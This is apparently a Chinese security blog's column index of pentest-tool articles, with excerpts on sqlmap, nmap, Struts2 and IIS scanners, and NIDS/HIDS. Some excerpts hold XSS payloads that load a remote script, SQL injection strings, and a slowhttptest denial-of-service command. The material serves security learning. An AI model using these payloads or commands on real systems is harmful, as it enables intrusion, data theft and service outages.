安全工具
关注
分享
扫一扫
文章平均质量分 77
企业信息安全
挑战自我
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
Parrot Security OS安装搜狗拼音
搜狗拼音的下载地址https://pinyin.sogou.com/linux/?r=pinyin3选择适合自己版本的输入法。直接运行安装程序应该会出现以下提示这时候打开终端输入 apt-get update等完成后再输入 apt-get dist-upgrade不出意外应该会出现以下结果这时输入apt --fix-broken install等出现 Y/N时选择 Y等更...转载 2018-09-04 15:09:15 · 2931 阅读 · 0 评论 -
百个XSS-payload注入汇总
(1)普通的XSS JavaScript注入<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(2)IMG标签XSS使用JavaScript命令<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(3)IMG标签无分号无引号<IMG SRC=javasc...原创 2018-10-04 17:55:30 · 3823 阅读 · 1 评论 -
sqlmap命令3
当给sqlmap这么一个url (http://www.target.com/sqlmap/mysql/get_int.php?id=1) 的时候,它会:1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、...转载 2019-04-11 09:59:19 · 1205 阅读 · 0 评论 -
sqlmap命令2
sqlmap简介sqlmap支持五种不同的注入模式:1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询...转载 2019-04-11 09:57:16 · 948 阅读 · 0 评论 -
sqlmap命令
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data...转载 2019-04-11 09:51:22 · 1585 阅读 · 0 评论 -
渗透测试工具实战技巧合集
最好的 NMAP 扫描策略# 适用所有大小网络最好的 nmap 扫描策略# 主机发现,生成存活主机列表$ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24$ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt# 端口发现,发现大部分常用端口#...转载 2019-03-23 11:05:16 · 1110 阅读 · 0 评论 -
分享国外安全团队及工具
名称 版 描述 主页 0trace 1.5 跳跃枚举工具 http://jon.oberheide.org/0trace/ 3proxy 0.7.1.1 微小的免费代理服务器。 http://3proxy.ru/ 3proxy-win32的 0.7.1....原创 2019-03-19 15:15:43 · 16759 阅读 · 0 评论 -
关于安全产品的“联动”
最近一直在做NIDS,已有雏形,甚是欣慰,但是还是有很多问题.NIDS的本质是通过流量中发现异常行为,可能是明显的webshell通讯,恶意软件通讯,可能是奇奇怪怪的对外/对内连接.在这个层面上的确可以发现非加密的各种安全问题,但是我们会发现一些NIDS本身很难优化的地方.1.发现了异常连接(如DB Server主动的对外HTTP请求,且该Web Server非公司资产)2.发现了外部...转载 2018-12-27 12:56:42 · 1189 阅读 · 0 评论 -
[转]点融开源AgentSmith HIDS 一套轻量级的HIDS系统
文|陈越 我们将该项目开源,希望可以帮助到广大的信息安全团队来建设和完善自己的HIDS体系,也希望大家能够支持并共同维护这个还处于刚起步阶段的项目。项目地址:https://github.com/DianrongSecurity/AgentSmith-HIDS HIDS要解决的问题 HIDS(Host-based Intrusion Detection S...转载 2018-12-27 12:16:02 · 2496 阅读 · 0 评论 -
slowhttptest 慢速攻击
apt-get install slowhttptest slowhttptest -hslowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://www.xxx.com/index.html -x 24 -p 3slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 819...原创 2018-10-12 16:35:31 · 1258 阅读 · 0 评论 -
Struts2-045漏洞批量扫描工具
一个 Struts2-045漏洞批量扫描工具https://github.com/lijiejie/struts2_045_scanRequirements 1 2 pip install requests Usage 1 2 3 4 5 6 7 8 9...转载 2018-11-23 16:36:49 · 2881 阅读 · 0 评论 -
IIS短文件名暴力枚举漏洞利用工具(IIS shortname Scanner)
上文我已经介绍了IIS短文件名暴力枚举漏洞的成因和利用。这里只是发出昨天写的脚本。脚本可以测试对应的URL是否存在漏洞,若存在漏洞,则猜解文件夹下所有的短文件名:包括文件和文件名。网上早前已经有公开的工具了:https://code.google.com/p/iis-shortname-scanner-poc/我没有参考他的代码。自己用python实现了一个漏洞利用脚本。简单测试,...转载 2018-11-23 16:35:55 · 15419 阅读 · 1 评论 -
.DS_Store文件泄漏利用工具: ds_store_exp
https://github.com/lijiejie/ds_store_exp .DS_Store是Mac下Finder用来保存如何展示 文件/文件夹 的数据文件,每个文件夹下对应一个。如果开发/设计人员将.DS_Store上传部署到线上环境,可能造成文件目录结构泄漏,特别是备份文件、源代码文件。ds_store_exp 是一个.DS_Store 文件泄漏利用脚本,它解析.DS_...转载 2018-11-23 16:34:43 · 8739 阅读 · 2 评论 -
sql注入payload
分享一些平时测试用的sql payloads1:BOOL SQLINJECTION\'"%df'%df"and 1=1and 1=2' and '1'='1' and '1'='2" and "1"="1" and "1"="2) and (1=1) and (1=2') and ('1'='1') and ('1'='2%' and 1=1 and '%'...转载 2019-04-12 15:12:50 · 4058 阅读 · 0 评论